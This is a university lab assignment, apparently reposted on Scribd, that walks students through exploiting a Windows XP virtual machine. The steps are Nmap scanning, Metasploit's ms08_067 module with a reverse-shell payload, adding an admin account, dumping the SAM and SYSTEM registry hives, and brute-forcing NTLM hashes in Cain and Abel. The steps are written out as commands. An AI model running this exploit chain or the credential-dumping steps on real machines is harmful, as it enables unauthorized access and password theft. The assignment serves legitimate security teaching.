Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
3 views

Lab Assignment 5

This document outlines a group assignment focused on cracking passwords for Windows XP using penetration testing tools like Kali Linux and Metasploit. It includes detailed steps for downloading Windows XP, gathering system information, exploiting vulnerabilities, creating an administrator account, and using Cain and Abel to crack the password of a student account. The assignment emphasizes the importance of original work and requires screenshots as proof of completion for various tasks.

Uploaded by

riteshnarwade03
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
3 views

Lab Assignment 5

This document outlines a group assignment focused on cracking passwords for Windows XP using penetration testing tools like Kali Linux and Metasploit. It includes detailed steps for downloading Windows XP, gathering system information, exploiting vulnerabilities, creating an administrator account, and using Cain and Abel to crack the password of a student account. The assignment emphasizes the importance of original work and requires screenshots as proof of completion for various tasks.

Uploaded by

riteshnarwade03
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Cracking Password

Overview:
Operating Systems keep the passwords as Hash Code. Some applications like Cain and Abel can
crack the passwords as long as the program finds the hash codes. In this Assignment, we use
penetration tools to break to Windows XP in our labs.
Answers to the questions must be your own words. Don’t copy from other sources.
Objective:
This assignment is a group assignment however, all members must submit it separately). You
need to use your Kali Linux, Windows 10, and Windows XP. Make sure all the VMs’ network
adapter set with Host Only.
You don't have any information about Windows XP. We try to gather information from Windows
XP and attack it via Metasploit using Kali Linux tools. By creating an account and setting it as an
“Administrator” member, you can login to Windows XP with your account. You don't want to
change any account's password, so you want to crack the passwords.
Transfer Sam and System files to your Windows 10 and use Cain and Abel to crack the
passwords.

The Lab Activities


Part 1: Download Windows XP (OVA file)
1. Click on the link provided in the Assignment and download the Windows XP
2. Open your VMWare and click on Open Virtual Machine
3. Find the downloaded OVA file and input the information to import the image.

Part 2: Investigate the Windows XP and Load Windows Shell Reverse


You don't have any access to Windows XP. You must find what kind of service pack it has.
What is its IP address?
1. Use the Nmap command and find the Windows XP IP address. (Hint: search as Ping)
2. Use Nmap command as intense scan to find information about the Windows XP.
(Hint: search for Operating System as single host)
3. Take a screenshot of the Windows XP information

Now you have all information you need to attack Windows XP.
Load Metasploit on your Kali Linux. You need to find some information about how to attack
Windows XP using Metasploit frame work:

1. Search Metasploit for ms08-067


Use search command to search if any module is available in Metasploit for vulnerability in
focus which is ms08–067. Type following command:

search ms08–067
2. Find more information about the module
Now in order to gather detailed information about the available Metasploit module for the
ms08–067 vulnerability, we will enter the following command in the Kali Linux terminal

Info exploit/windows/smb/ms08_067_netapi

3. Change to ms08_067 directory


Once we confirm the specific Metasploit module (exploit), we can execute the command
below to use the specific exploit available for ms08–067 vulnerability.

use exploit/windows/smb/ms08_067_netapi

4. Setting up the Module Options


Once you have chosen a specific exploit, enter the following command to list all options
available for this exploit module.

show options

5. Setting RHOST to Target Windows XP VM IP Address


Set RHOST [IP Address of Windows XP VM]

6. Selecting and using any of the compatible payloads for this exploit module
Now we can set the payload, let's say windows/shell_reverse_tcp, by using the command
below

set payload windows/shell_reverse_tcp

Q1- Why did you use payload? And why did you use shell_reverse_tcp?

7. Setting up Local Host, Kali Linux


Find Kali Linux IP address. Now, we need to set the value for LHOST option to Kali Linux
by using the command below:

set LHOST [Kali Linux IP Address]

Enter the following command to view the set options.

show options
(Take a screenshot)

8. Exploiting the Target with Metasploit


Now enter the exploit command in Metasploit. You should see the Windows XP command
prompt like the following pictures:
Part 3: Create an account with administrator privilege in the Windows XP

We don't have any access to Windows XP. By using Metasploit, you have access to the Win XP
now. We need to create an account and add this account as a member of the administrators'
group. Use Windows "net" command to add this account. (search for the command and find
how to use it) (Take a screenshot)
Now, you have a username and Password to login to Windows XP.

Q2- How can you use the net command to show all local groups in Win XP?

Part 4: Crack the student account’s password


You have full access to Windows XP. You must find out the "student" account's Password.
DON'T CHANGE THE "student" ACCOUNT'S PASSWORD.
Windows keeps passwords as NTLM Hash in the “sam file”.
The system file privileges are required to view passwords. Now you need to copy these files to
VM Windows 10. However, you can't copy these files from directory
C:\Windows\System32\config.
For copying these files, you need to use the reg command to copy them from the Windows
registary to the files.
• Use this command as follow:

reg save HKLM\sam c:\sam


reg save HKLM\system c:\system

Q3- What is HKLM, and why does Windows use it?

You need to transfer these files to your Windows 10 VM. You can:
• copy/paste them from Windows XP to Windows 10 VM
OR
• copy/paste them to your host OS (Windows or Mac) from XP, then copy/paste to
Windows 10 VM.
Now you need to insert all XP accounts to Cain and Abel program to crack the student account's
Password. Follow the instructions to do it:
• Run Cain application
• Click on the Cracker tab
• Right-click on the cracker window and select Add to list from the menu (Or press Insert
key)
• Select "Import Hashes from a SAM database."
• Load transferred sam file to this window
• Load transferred system to the Boot Key (HEX) box, and it will provide a Hex code.
• Copy the HEX code that you get and paste it into the text box of Boot Key (HEX).
• Click on next and see all Win XP accounts with their hashes.
• Use Bruteforce attack and the following Win XP password policy to crack the student's
Password.
o You need to check the Local Security Policy to find out the Win XP password
settings. (Control Panel, Administrative Tools, Local Security Policy)
o If you set Bruteforce settings properly, your password cracking will take 5 to 12
minutes.
o If it takes more than 12 minutes, recheck your settings.
o Take a screenshot of the result.

Now login to the windows XP with student account and do as follow for proving your work:
• Use CMD or Paint to write your names on it.
• Don't change the background.
• Take a screenshot

Lab Report Write-up


Submit your lab results using the template provided for las.

You might also like